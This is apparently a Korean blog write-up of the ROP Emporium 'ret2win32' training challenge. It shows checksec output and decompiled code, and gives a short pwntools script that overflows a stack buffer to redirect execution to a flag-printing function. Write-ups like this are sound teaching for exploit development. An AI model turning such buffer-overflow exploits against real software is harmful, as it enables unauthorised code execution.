본문 바로가기
ROP emporium

ret2win32

file ret2win32 
ret2win32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e1596c11f85b3ed0881193fe40783e1da685b851, not stripped

 

checksec ret2win32 
[*] '/root/ropemporium/ret2win32/ret2win32'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    Stripped:   No

 

cdecl은 x86 C compiler의 default calling convention이라고 한다.

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setvbuf(_bss_start, 0, 2, 0);
  puts("ret2win by ROP Emporium");
  puts("x86\n");
  pwnme();
  puts("\nExiting");
  return 0;
}

 

int pwnme()
{
  _BYTE s[40]; // [esp+0h] [ebp-28h] BYREF

  memset(s, 0, 0x20u);
  puts("For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!");
  puts("What could possibly go wrong?");
  puts("You there, may I have your input please? And don't worry about null bytes, we're using read()!\n");
  printf("> ");
  read(0, s, 0x38u);
  return puts("Thank you!");
}

 

int ret2win()
{
  puts("Well done! Here's your flag:");
  return system("/bin/cat flag.txt");
}

 

from pwn import * 

p=process('./ret2win32')
payload=b'A'*44
payload+=p32(0x804862c)
p.send(payload)
p.interactive()

'ROP emporium' 카테고리의 다른 글

split32  (0) 2024.11.21
ret2win  (0) 2024.11.17